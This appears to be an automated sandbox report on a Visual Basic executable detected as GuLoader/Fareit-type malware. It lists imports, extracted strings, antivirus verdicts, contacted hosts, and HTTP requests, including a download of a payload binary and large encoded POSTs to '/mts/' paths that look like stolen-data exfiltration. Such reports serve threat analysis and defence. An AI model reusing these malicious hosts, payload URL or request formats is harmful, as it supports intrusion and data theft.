oleaut32.dll.VarImp
oleaut32.dll.VarMod
oleaut32.dll.VarMul
oleaut32.dll.VarOr
oleaut32.dll.VarPow
oleaut32.dll.VarSub
oleaut32.dll.VarXor
oleaut32.dll.VarAbs
oleaut32.dll.VarFix
oleaut32.dll.VarInt
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarRound
oleaut32.dll.VarCmp
oleaut32.dll.VarDecAdd
oleaut32.dll.VarDecCmp
oleaut32.dll.VarBstrCat
oleaut32.dll.VarCyMulI4
oleaut32.dll.VarBstrCmp
ole32.dll.CoCreateInstanceEx
ole32.dll.CLSIDFromProgIDEx
sxs.dll.SxsOleAut32MapIIDOrCLSIDToTypeLibrary
user32.dll.GetSystemMetrics
user32.dll.MonitorFromWindow
user32.dll.MonitorFromRect
user32.dll.MonitorFromPoint
user32.dll.EnumDisplayMonitors
user32.dll.GetMonitorInfoA
asycfilt.dll.FilterCreateInstance
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
version.dll.VerQueryValueA
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
kernel32.dll.NlsGetCacheUpdateCount
kernel32.dll.GetCalendarInfoW
ws2_32.dll.#23
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
iphlpapi.dll.NotifyUnicastIpAddressChange
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
ws2_32.dll.GetAddrInfoW
oleaut32.dll.#8
oleaut32.dll.#9
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
advapi32.dll.RegOpenKeyW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
oleaut32.dll.#500
ws2_32.dll.#5
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
oleaut32.dll.#2
ole32.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
oleaut32.dll.#6
api-ms-win-downlevel-advapi32-l1-1-0.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
"C:\Users\Louise\AppData\Local\Temp\k9.exe"

BinGraph Download graph

PE Information

Image Base Entry Point Reported Checksum Actual Checksum Minimum OS Version Compile Time Import Hash Icon Icon Exact Hash Icon Similarity Hash
0x00400000 0x004014f0 0x0002884f 0x0002884f 4.0 2015-12-29 22:49:03 4f89eae09cb20b0bd74b74cfe2ed0cce 0ec54e18d6469565a9f555d4179fc6fb 7cedf82ed0ee9c8616d0d7f4d30c4da0

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00001000 0x00016b2c 0x00017000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.71
.data 0x00018000 0x00018000 0x00000e58 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x00019000 0x00019000 0x00001598 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 3.06

Resources

Name Offset Size Language Sub-language Entropy File type
RT_ICON 0x000193e0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 3.95 None
RT_ICON 0x000193e0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 3.95 None
RT_ICON 0x000193e0 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 3.95 None
RT_GROUP_ICON 0x000193b0 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL 3.07 None
RT_VERSION 0x00019150 0x00000260 LANG_CATALAN SUBLANG_DEFAULT 3.23 None

Imports

0x401000 None
0x401004 _CIcos
0x401008 _adj_fptan
0x40100c __vbaVarMove
0x401010 None
0x401014 None
0x401018 __vbaFreeVar
0x40101c __vbaStrVarMove
0x401020 None
0x401024 __vbaLenBstr
0x401028 None
0x40102c __vbaFreeVarList
0x401030 _adj_fdiv_m64
0x401034 _adj_fprem1
0x401038 None
0x40103c None
0x401040 __vbaStrCat
0x401044 None
0x40104c __vbaLenBstrB
0x401050 None
0x401054 None
0x401058 _adj_fdiv_m32
0x40105c __vbaAryDestruct
0x401060 __vbaLateMemSt
0x401064 None
0x401068 None
0x40106c __vbaObjSet
0x401070 None
0x401074 _adj_fdiv_m16i
0x401078 __vbaObjSetAddref
0x40107c _adj_fdivr_m16i
0x401080 None
0x401084 None
0x401088 None
0x40108c __vbaFpR8
0x401090 _CIsin
0x401094 None
0x401098 None
0x40109c __vbaChkstk
0x4010a0 EVENT_SINK_AddRef
0x4010a8 __vbaStrCmp
0x4010ac __vbaVarTstEq
0x4010b0 __vbaAryConstruct2
0x4010b4 __vbaObjVar
0x4010b8 None
0x4010bc None
0x4010c0 _adj_fpatan
0x4010c4 None
0x4010c8 __vbaRedim
0x4010cc None
0x4010d0 EVENT_SINK_Release
0x4010d4 __vbaUI1I2
0x4010d8 _CIsqrt
0x4010e0 None
0x4010e4 __vbaExceptHandler
0x4010e8 None
0x4010ec _adj_fprem
0x4010f0 _adj_fdivr_m64
0x4010f4 __vbaFPException
0x4010f8 __vbaStrVarVal
0x4010fc None
0x401100 None
0x401104 _CIlog
0x401108 __vbaNew2
0x40110c _adj_fdiv_m32i
0x401110 _adj_fdivr_m32i
0x401114 __vbaStrCopy
0x401118 None
0x40111c __vbaI4Str
0x401120 None
0x401124 __vbaFreeStrList
0x401128 None
0x40112c None
0x401130 _adj_fdivr_m32
0x401134 _adj_fdiv_r
0x401138 None
0x40113c None
0x401140 None
0x401144 None
0x401148 __vbaInStrB
0x40114c None
0x401150 __vbaVarDup
0x401154 __vbaStrComp
0x401158 None
0x40115c __vbaLateMemCallLd
0x401160 None
0x401164 _CIatan
0x401168 __vbaStrMove
0x40116c None
0x401170 _allmul
0x401174 None
0x401178 _CItan
0x40117c None
0x401180 __vbaFPInt
0x401184 _CIexp
0x401188 __vbaFreeObj
0x40118c __vbaFreeStr
0x401190 None

!This program cannot be run in DOS mode.
.text
`.data
.rsrc
MSVBVM60.DLL
Raasyltesfoh1
Nanogram3
BABYMAJ
"Exif
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
O\mSTXZf
hmq{io
oj>ojtq
I%I$~Y
I+N;?
~oje^
Eu3X[
`O:d_
9>V|}
SE[[{
T.dY.
Q[ky6
ui.ty
x~I4[VY
>|WIk
'q$2-
Yl4H.
8~&|O
2[]\/
=RFy<
Kvi7o
H$_5S
sm#mm
Gc}ukoy
Z+}V%m
w/2z6
nCom
7Cn8v
Fw '
w '
tw ('
0'oou
/ti}F
o =/t
@'ooe
pnGmx
u2D
.:$/zQ
.:$/z}
f4!{K
w:d
y1x|k
a$4R]^
y1x|k
a$4R]^
y1x|k
tuwZoe
'on0v
"'ooT
UFC&$
!$<""
wG'/PW
nf4D_
0'oml
/" nT
7'o"#D6
f4a}F
f4xn5
^7Gt/
Kj#Q$
~ZQ/S
._6I%
<Egyu&
[=Yn5H
huKth
k?/t?=:
}t7^e
<Qqmk2
y$k$v
3-tS1
i4=SZ
DRKq/
8Ws=~
y.#o>T
x~I?w
_5[sm
kK]>YW~
Coq,s
U~_)~o
x^7I7,
]I4}/P
x]y_:
333333334
D951015=
%),//,)$
/96-*1H
$,698
MGB?>>ABFL
BABYMAJ
Kulegravningm
Option3
tidsregni
Option2
Efterskolers
Option1
Label1
Label1
Line2
Line1
VB5!6&*
apheticup
Raasyltesfoh1
Raasyltesfoh1
Raasyltesfoh1
Nanogram3
Reactivityso
mandskaberspl
advancei
Colicinetol
DISCIPLINARMI
Bucerotin4
Machinedpr8
Overd9
Unguentousudm
COCCOGONA
BEHOLDERNESS
tidsregni
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Label1
Kulegravningm
Efterskolers
Unalcoholizeds
GLYCOSINE
FLODHESTEN
Elektronrrs8
TROSKABSLFTET
__vbaStrComp
VBA6.DLL
__vbaStrVarVal
__vbaLenBstrB
__vbaI4Str
__vbaStrMove
__vbaLenBstr
__vbaFPInt
__vbaInStrB
__vbaAryDestruct
__vbaRedim
__vbaVarMove
__vbaStrCmp
__vbaGenerateBoundsError
__vbaFpR8
__vbaAryConstruct2
__vbaFreeStr
__vbaUI1I2
__vbaStrCopy
__vbaVarDup
__vbaFreeVar
__vbaVarTstEq
__vbaLateMemSt
__vbaFreeVarList
__vbaFreeStrList
__vbaStrCat
__vbaLateMemCallLd
__vbaObjVar
__vbaObjSetAddref
__vbaObjSet
__vbaFreeObj
__vbaHresultCheckObj
__vbaNew2
__vbaStrVarMove
Ijnefaldende4
UNCORRUPTEDNESS
hkeren
Valloners1
Rachiomyelitis5
Pickwicks6
sirdars
Skulptere2
tvesprogethed
sumeriskes
HUMANISATION
autostoppenes
termografi
SKILDPADDESUPPENS
SAMMENSYNINGENS
Aktivitetscenteret9
VIEVANDSKARRENE
Extroversive
FILAMENTERS
guvernantelitteraturens
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
_adj_fdiv_m64
_adj_fprem1
__vbaStrCat
__vbaHresultCheckObj
__vbaLenBstrB
_adj_fdiv_m32
__vbaAryDestruct
__vbaLateMemSt
__vbaObjSet
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaFpR8
_CIsin
__vbaChkstk
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaStrCmp
__vbaVarTstEq
__vbaAryConstruct2
__vbaObjVar
_adj_fpatan
__vbaRedim
EVENT_SINK_Release
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaStrVarVal
_CIlog
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaI4Str
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaInStrB
__vbaVarDup
__vbaStrComp
__vbaLateMemCallLd
_CIatan
__vbaStrMove
_allmul
_CItan
__vbaFPInt
_CIexp
__vbaFreeObj
__vbaFreeStr
D951015=
%),//,)$
/96-*1H
$,698
MGB?>>ABFL
333333334
,/KPip
/-P?pR
Printningens1
Visible
RACERBILERS
OUTMAGIC
Pulsions
Whipsaws7
ABBEDIERNE
aurichloride
kaliumkloridets
Appendicalgia
temperaturfordelingernes
Originaldiskettes
POLITIFULDMGTIGES
MANUSSET
Vestmented
Broderingen2
TILSENDT
nonundergraduate
Nonplatitudinously
panini
Indkommet
Illative7
WALTHER
belton
Dockyardman
ROBERTAS
Genbrugsanlggets6
TARERINGERS
CENTERSKOLES
TRIADERS
UVEJRENE
scenarieformen
erfaringsvidenskabernes
billedlotteriets
Bioseston
Roudas6
polygenesis
DIDUCING
Sandworm
INADEPT
Workbag
Nautiloidean
dokumentationerne
dekametre
snitgrnts
outbullied
UPAAKLDTES
Fasterens
NDRINGSFLAG
ARYLS
goaltender
SVMMEPRVENS
SAMMENBUNKNINGER
Seedbed7
hebetation
SCOGGAN
Ugandan
Hjertefrekvenser7
Gipsdeponeringers
Primaveral1
Unsegregating
Cucurbite1
Treebine
SUPPOSABLE
Vidnesbyrd
Blodanalyse
angrebskrige
Electrochronometer3
Svarportoer1
Alternation
unclustered
DUMFOUNDING
Overholds
Tumblebug2
Billettere4
hstpanteretigheder
INBRING
mistendes
Spryer
BEAMWORK
CORRIGIBLE
Fivescore5
stvlendes
Draabers
Baadsmandsstoles
Srskrivningers4
DDSFJENDE
Opstarte7
skovturenes
laservison
afstemningstemaet
Tierlike2
Gungrendes7
Udladerens7
dollarkursens
PREPAINFUL
pakkelsning
NEBULISE
ORSON
ANGEKOK
HANNEN
MONOGRAPTUS
Prioritizing4
Fljlerne4
MENFRA
Feriebarns3
deliquescent
crested
spettle
Pegasusserne8
KRLIGHEDSSORG
Multivolume
centralstyre
Geonegative
FORLAGSPROTOKOLLERNES
Fortlletid
DIFFUSIMETER
Destillationernes7
Hjulbre
Varsovienne5
STIPITATE
ORIENTALISM
LABOURABILITY
hymettian
PADELION
grundlovs
MAALLS
ENERGITEKNOLOGIER
Antologia
scorpionfish
Friturekurve6
Udstraekning
Skeller
purvis
Atomforsgsstations2
Tsardmmer6
Unquailingly4
besynderlighedens
Appreciator
FAUVISM
Kartotekiseres
Ekstraordinrt
Morel2
NONPROHIBITORILY
arbejdspladser
Facons
Uretmssigt
Recepissers1
Kuglelejet
Illegalt
Grumps
Seismograms
FLETOPERATION
Talefilms
Snorkelyde8
FRESHLY
Tophi
hefter
DISKVALIFICERING
Relativization
VICARIOUSNESSES
Mejeriejer5
Absmho
KONSTITUERE
Bortgivelse4
PROTEKTIONISME
unlithographic
ROEDVINSTYPE
EPIBOLISM
Wienerbrdenes1
UNFLUORINATED
Erhvervsforsikringer2
PIFTS
Microsporidia5
initive
RESBEVISNINGERNES
MISSIONIZED
Cobego
Undigged3
subeditorial
Baglaas
CHIZZ
LOVEFUL
stereoplades
Skvts7
pantheress
Stormogulerne9
Foamless
HONEYS
Odontostomatous
knoben
CANNING
NGLEHUL
Drikkevisernes4
BOARFISH
Primrfilen5
Simial5
korrumpering
Bifer
Dimittender
Rhapsodize
TILSKD
Lrestnings
Unperforated1
Axoplasm
Skibshandler
SPACISTOR
CHEMOSORB
Marrying8
Skrhatten
Admiralsuniform3
steffensurternes
FAIRYLAND
kludetppernes
Randomizer9
Parthenogeny6
DATAANLAEG
Smaasvbene4
Halvftrene
Naig1
Skraakanter3
PERIFERIUDSTYRETS
Aarsgammel7
pyntegrnt
Tryllebindes3
UBESINDIGHEDER
Strygefries
DISHARMONISM
Snood
antistrike
VIKTUALIEFORRETNINGS
westralian
Overtakable
Datisi
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040304B0
LegalCopyright
Internal
LegalTrademarks
Internal
ProductName
Raasyltesfoh1
FileVersion
ProductVersion
InternalName
apheticup
OriginalFilename
apheticup.exe
,/KPip
/-P?pR

Full Results

Engine Signature Engine Signature Engine Signature
Bkav Clean MicroWorld-eScan Clean CMC Clean
CAT-QuickHeal Clean Qihoo-360 HEUR/QVM03.0.B441.Malware.Gen ALYac Clean
Cylance Unsafe Zillya Clean SUPERAntiSpyware Clean
Sangfor Malware K7AntiVirus Clean Alibaba Clean
K7GW Clean Cybereason Clean Arcabit Clean
Invincea Clean Baidu Clean F-Prot Clean
Symantec Clean TotalDefense Clean APEX Malicious
Avast Clean ClamAV Clean Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Clean NANO-Antivirus Clean Paloalto generic.ml
ViRobot Clean Tencent Clean Ad-Aware Clean
Emsisoft Clean Comodo Clean F-Secure Clean
DrWeb Clean VIPRE Clean TrendMicro Clean
McAfee-GW-Edition Clean Fortinet Clean Trapmine malicious.high.ml.score
FireEye Clean Sophos Clean SentinelOne DFI - Suspicious PE
Cyren Clean Jiangmin Clean Webroot Clean
Avira Clean MAX Clean Antiy-AVL Clean
Kingsoft Clean Endgame malicious (high confidence) Microsoft Clean
AegisLab Clean ZoneAlarm UDS:DangerousObject.Multi.Generic Avast-Mobile Clean
AhnLab-V3 Clean Acronis Clean McAfee Fareit-FST!E90F65F7349E
TACHYON Clean VBA32 Clean Malwarebytes Clean
Zoner Clean ESET-NOD32 a variant of Win32/GenKryptik.ELXE TrendMicro-HouseCall Clean
Rising Downloader.Guloader!1.C738 (CLASSIC) Yandex Clean Ikarus Clean
eGambit Unsafe.AI_Score_80% GData Clean BitDefenderTheta Gen:[email protected]
AVG Clean Panda Clean CrowdStrike Clean
MaxSecure Clean
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 67.217.34.88 [VT] United States
N 63.250.37.110 [VT] United States
Y 51.105.208.173 [VT] United Kingdom
N 23.20.239.12 [VT] United States
N 188.165.53.185 [VT] France

TCP

Source Source Port Destination Destination Port
192.168.1.7 49174 13.107.42.23 443
192.168.1.7 49176 13.107.42.23 443
192.168.1.7 16978 188.165.53.185 www.esprit-de-connaisseur.com 30290
192.168.1.7 14421 188.165.53.185 www.esprit-de-connaisseur.com 18545
192.168.1.7 20037 188.165.53.185 www.esprit-de-connaisseur.com 22631
192.168.1.7 27727 188.165.53.185 www.esprit-de-connaisseur.com 30576
192.168.1.7 25189 188.165.53.185 www.esprit-de-connaisseur.com 12627
192.168.1.7 29741 188.165.53.185 www.esprit-de-connaisseur.com 20821
192.168.1.7 17745 188.165.53.185 www.esprit-de-connaisseur.com 29234
192.168.1.7 31350 188.165.53.185 www.esprit-de-connaisseur.com 28249
192.168.1.7 20550 188.165.53.185 www.esprit-de-connaisseur.com 13642
192.168.1.7 12881 188.165.53.185 www.esprit-de-connaisseur.com 27960
192.168.1.7 14186 188.165.53.185 www.esprit-de-connaisseur.com 29776
192.168.1.7 17510 188.165.53.185 www.esprit-de-connaisseur.com 19784
192.168.1.7 31050 188.165.53.185 www.esprit-de-connaisseur.com 19270
192.168.1.7 20831 188.165.53.185 www.esprit-de-connaisseur.com 26211
192.168.1.7 12342 188.165.53.185 www.esprit-de-connaisseur.com 19777
192.168.1.7 26180 188.165.53.185 www.esprit-de-connaisseur.com 31027
192.168.1.7 25418 188.165.53.185 www.esprit-de-connaisseur.com 17750
192.168.1.7 27734 188.165.53.185 www.esprit-de-connaisseur.com 20053
192.168.1.7 26934 188.165.53.185 www.esprit-de-connaisseur.com 29237
192.168.1.7 19766 188.165.53.185 www.esprit-de-connaisseur.com 23085
192.168.1.7 13648 188.165.53.185 www.esprit-de-connaisseur.com 10357
192.168.1.7 17509 188.165.53.185 www.esprit-de-connaisseur.com 18279
192.168.1.7 28246 188.165.53.185 www.esprit-de-connaisseur.com 30313
192.168.1.7 21079 188.165.53.185 www.esprit-de-connaisseur.com 18487
192.168.1.7 18531 188.165.53.185 www.esprit-de-connaisseur.com 32357
192.168.1.7 18543 188.165.53.185 www.esprit-de-connaisseur.com 18258
192.168.1.7 27212 188.165.53.185 www.esprit-de-connaisseur.com 13129
192.168.1.7 13625 188.165.53.185 www.esprit-de-connaisseur.com 13135
192.168.1.7 26223 188.165.53.185 www.esprit-de-connaisseur.com 26188
192.168.1.7 21068 188.165.53.185 www.esprit-de-connaisseur.com 14447
192.168.1.7 20784 188.165.53.185 www.esprit-de-connaisseur.com 23142
192.168.1.7 25951 188.165.53.185 www.esprit-de-connaisseur.com 18529
192.168.1.7 14183 188.165.53.185 www.esprit-de-connaisseur.com 20529
192.168.1.7 32326 188.165.53.185 www.esprit-de-connaisseur.com 29529
192.168.1.7 20551 188.165.53.185 www.esprit-de-connaisseur.com 18753
192.168.1.7 49195 188.165.53.185 www.esprit-de-connaisseur.com 80
192.168.1.7 49196 188.165.53.185 www.esprit-de-connaisseur.com 80
192.168.1.7 49189 23.20.239.12 www.parkwayautogroup.com 80
192.168.1.7 44973 52.114.133.61 7277
192.168.1.7 36807 52.114.133.61 63625
192.168.1.7 30029 63.250.37.110 www.vinoblay.com 12634
192.168.1.7 24954 63.250.37.110 www.vinoblay.com 17232
192.168.1.7 20566 63.250.37.110 www.vinoblay.com 18999
192.168.1.7 28264 63.250.37.110 www.vinoblay.com 28023
192.168.1.7 22131 63.250.37.110 www.vinoblay.com 17510
192.168.1.7 13652 63.250.37.110 www.vinoblay.com 25145
192.168.1.7 16761 63.250.37.110 www.vinoblay.com 23152
192.168.1.7 24403 63.250.37.110 www.vinoblay.com 21809
192.168.1.7 13672 63.250.37.110 www.vinoblay.com 27501
192.168.1.7 30017 63.250.37.110 www.vinoblay.com 24391
192.168.1.7 18257 63.250.37.110 www.vinoblay.com 25924
192.168.1.7 27237 63.250.37.110 www.vinoblay.com 25974
192.168.1.7 26993 63.250.37.110 www.vinoblay.com 28214
192.168.1.7 18482 63.250.37.110 www.vinoblay.com 28994
192.168.1.7 24943 63.250.37.110 www.vinoblay.com 16743
192.168.1.7 23160 63.250.37.110 www.vinoblay.com 17464
192.168.1.7 25671 63.250.37.110 www.vinoblay.com 26742
192.168.1.7 29266 63.250.37.110 www.vinoblay.com 18787
192.168.1.7 13168 63.250.37.110 www.vinoblay.com 25142
192.168.1.7 26964 63.250.37.110 www.vinoblay.com 27725
192.168.1.7 25957 63.250.37.110 www.vinoblay.com 18558
192.168.1.7 25686 63.250.37.110 www.vinoblay.com 13171
192.168.1.7 19529 63.250.37.110 www.vinoblay.com 18277
192.168.1.7 12642 63.250.37.110 www.vinoblay.com 19053
192.168.1.7 19020 63.250.37.110 www.vinoblay.com 22129
192.168.1.7 20606 63.250.37.110 www.vinoblay.com 27715
192.168.1.7 17458 63.250.37.110 www.vinoblay.com 22329
192.168.1.7 26692 63.250.37.110 www.vinoblay.com 27006
192.168.1.7 12644 63.250.37.110 www.vinoblay.com 12887
192.168.1.7 22869 63.250.37.110 www.vinoblay.com 19304
192.168.1.7 25935 63.250.37.110 www.vinoblay.com 27467
192.168.1.7 26969 63.250.37.110 www.vinoblay.com 11577
192.168.1.7 16718 63.250.37.110 www.vinoblay.com 26441
192.168.1.7 16973 63.250.37.110 www.vinoblay.com 13421
192.168.1.7 12889 63.250.37.110 www.vinoblay.com 21360
192.168.1.7 28757 63.250.37.110 www.vinoblay.com 22581
192.168.1.7 26932 63.250.37.110 www.vinoblay.com 20585
192.168.1.7 13637 63.250.37.110 www.vinoblay.com 19012
192.168.1.7 30037 63.250.37.110 www.vinoblay.com 28798
192.168.1.7 49193 63.250.37.110 www.vinoblay.com 80
192.168.1.7 49194 63.250.37.110 www.vinoblay.com 80
192.168.1.7 49188 67.217.34.88 amuhapps.com 80
192.168.1.7 49191 95.101.78.106 80

UDP

Source Source Port Destination Destination Port
192.168.1.7 137 192.168.1.255 137
192.168.1.7 53011 8.8.8.8 53
192.168.1.7 53423 8.8.8.8 53
192.168.1.7 54277 8.8.8.8 53
192.168.1.7 55169 8.8.8.8 53
192.168.1.7 56221 8.8.8.8 53
192.168.1.7 56328 8.8.8.8 53
192.168.1.7 56943 8.8.8.8 53
192.168.1.7 57251 8.8.8.8 53
192.168.1.7 59227 8.8.8.8 53
192.168.1.7 59353 8.8.8.8 53
192.168.1.7 59810 8.8.8.8 53
192.168.1.7 61313 8.8.8.8 53
192.168.1.7 62371 8.8.8.8 53
192.168.1.7 64247 8.8.8.8 53
192.168.1.7 65103 8.8.8.8 53
192.168.1.7 65119 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
amuhapps.com [VT] A 67.217.34.88 [VT] 67.217.34.88 [VT]
www.parkwayautogroup.com [VT] A 23.20.239.12 [VT] 23.20.239.12 [VT]
www.aroundthehearth.net [VT] NXDOMAIN
www.vinoblay.com [VT] A 63.250.37.110 [VT] 63.250.37.110 [VT]
www.esprit-de-connaisseur.com [VT] A 188.165.53.185 [VT] 188.165.53.185 [VT]
www.cp75788.com [VT]
www.eskenaskhareji.com [VT]
www.hissexualhealth.com [VT]
www.electriciandearbornmi.com [VT]

HTTP Requests

URI Data
http://amuhapps.com/a1/bin_WHDqrJTtDa208.bin
GET /a1/bin_WHDqrJTtDa208.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: amuhapps.com
Cache-Control: no-cache

http://www.parkwayautogroup.com/mts/?OVolp=dJC7qAZce2ug3U8GWKjWyJsQhcgydeghdBU/9ylRi86kip+Jtmb5eRwP3b+D8a46&lhv4=H0DTRf2P8tY0iN
GET /mts/?OVolp=dJC7qAZce2ug3U8GWKjWyJsQhcgydeghdBU/9ylRi86kip+Jtmb5eRwP3b+D8a46&lhv4=H0DTRf2P8tY0iN HTTP/1.1
Host: www.parkwayautogroup.com
Connection: close

http://www.vinoblay.com/mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN
GET /mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN HTTP/1.1
Host: www.vinoblay.com
Connection: close

http://www.vinoblay.com/mts/
POST /mts/ HTTP/1.1
Host: www.vinoblay.com
Connection: close
Content-Length: 81915
Cache-Control: no-cache
Origin: http://www.vinoblay.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.vinoblay.com/mts/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

OVolp=FGrNNWl_uSK7VBXFW0UNOlWrUifMdLoRZH3lFJ(jnt2C5qKkUQDdpOxMDywjLO54cNDjQ6qy2eaGo0Zqd2MVIgEK1qMZriV_JBNmp3m-yulQPSABiW5jFKutoWcjDxPdDr~-WnytiP8aqmqCszsJhj0xkKjwpU8TRHNS7BUL4VtNZGGAss81RgO4E8cCrpqXpw4JbWx5bo0TEPTs0f(jeD3habfTXP01U7M51doTSKjLj6VEOqhUfksbSThoj0AbROodM8S_p5SjUUYZmN4GQ0tj3O2jjH(yDbsTqUA6cHqIujzAaA8rInCJ4uYWbxMgeD3FFqRlb1hLeFW0Wc~GxPB3Wu~wOzdZAvY4KveKxQ9AJp~TP8UzJaiG6AQyE8NLBnAmKG9d03GRGTWmMIBYKeVxMOhpxpxU4famY16-kbUhH-U6Ga7Sw-gKm5MncEYsyhPkWocUVt6WXYpaOUFwA14IdhWMuunpSq9PySYvulHsrLW6Kul5ff7yfSHKxMGOp6ZuSs(uHbtXKMR3Hk6i6QZQnSLecBWvRzX9z0M_~m9UXyBl0Cw2nnTxaixTkhGAx0LXvSbqn1mJXIY_g4mmowFFE35bxOCq3KBxlj01tQD9wLvkRintlAAEJ8KdcLP-TXEAiXjwh-Q4mflAaNyxtMpcgrownSn0RaoM9WA71drYXN5TBLLyAaCNDUbbEksuq9vLxs4tRHNOSrvI38o6x3xJyeqitYn9tHrOGrnmBg1OR5SvYeVqorul7dBOBnntVmbFv7brcjMBrTyIseMw47eDNXKEtqRVfvjQoutzCrXxuQkeMqB_m6QCLwPJMe1hFxS2NUxQHrPYPPHOEUHifzE5CwoKmhfY3Sz-7f1ljrV5rhlqvlJVynaWI2jBrGMboHhPfVvD8cBci4AzUuNem0Lwjq26Z0pLS9(RbnKXvb2etlL6gpluNqaLdKClibLY5lgqBShdPH~AdI0MNGIqG30YpcdeeraX2DMC(_sK2TzofxC6Xa2gnRUu1cxxDKZOV9Z9VzP-(3kMELk
http://www.esprit-de-connaisseur.com/mts/?OVolp=Eowx6rOx5ZT8Kc016FqZyZ3liYvuYMMnhwUnLKcqlNFGtZIsjnDoIJzI/txoB1MC&lhv4=H0DTRf2P8tY0iN
GET /mts/?OVolp=Eowx6rOx5ZT8Kc016FqZyZ3liYvuYMMnhwUnLKcqlNFGtZIsjnDoIJzI/txoB1MC&lhv4=H0DTRf2P8tY0iN HTTP/1.1
Host: www.esprit-de-connaisseur.com
Connection: close

http://www.esprit-de-connaisseur.com/mts/
POST /mts/ HTTP/1.1
Host: www.esprit-de-connaisseur.com
Connection: close
Content-Length: 81915
Cache-Control: no-cache
Origin: http://www.esprit-de-connaisseur.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.esprit-de-connaisseur.com/mts/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

OVolp=MK8LkMyYpeOLXc4M5TTjwOzR0NS8RfIi5QJiAPMV1fF1t71ZhiyRXa3us4hnPWoACVdoYIIXkCZqmPyhwXC1vr80R81lNpz4w7GJx0JIi0hLDMQutSyRucH9hlPf9zM6CPfPvk(4KgYKW2q1m_NLzlAcZmx65fNNaEBr(Ye56rw75FG6S6qEmyXOScCXkwCStFzvpRKksLoUHr2A9WJrit0HjDmv3t0QcFN_zo0LYlHiR3qu~VSoiwgrd0Q0gVL2cX7KViNC7ocs7WuWZFDnx_s1by4mOrJ4sndhemREI1gnHLJvmcKNcv181GJ5mQLE8kf4OcblZ6rzXoo7eHgxog8L(srLlfyWhCrcgQp2ZF2WEFVHTVFCh49krZqRQGFIlfLXEsKAfFX8URPUIB1xAOZfRykv4FxTYeey42Y3lAgiGRhtYHdSCxIgOPCwixHA3ulrEqknijzGIdijDr0QyMJXKLPwKYDTLVhKyghJNPaWOWpIf_bfpByeMhfPRo~e4DlrAAfASpAiioi_uSMN~-clIL~DVv9Yi6uMzQr9vm3Ff9fh6jCH0AAAKs9TvIRzBTN7WunUSDiwpmIyQlGjI6OLUeuOm1lTB6pY0ZSxnI6vnxim4Rz_7HEI6Ljr4W3BSKfSvUO9kNjqy_5xb4s6uIo-T7bkRK(beYgEEv~VJp0BpVo1TahL(a~0JuPSB-RAQnIeaCHGq_p2KHlTqVx6EGEx9fFaN4yIbFqTVYn3FWoSWl701VtieufjSTQ218iZsucZvcqIgZok(mhqOha73wkLS2~1jv9Hi6hMgIyhqolfb2eVsAvJP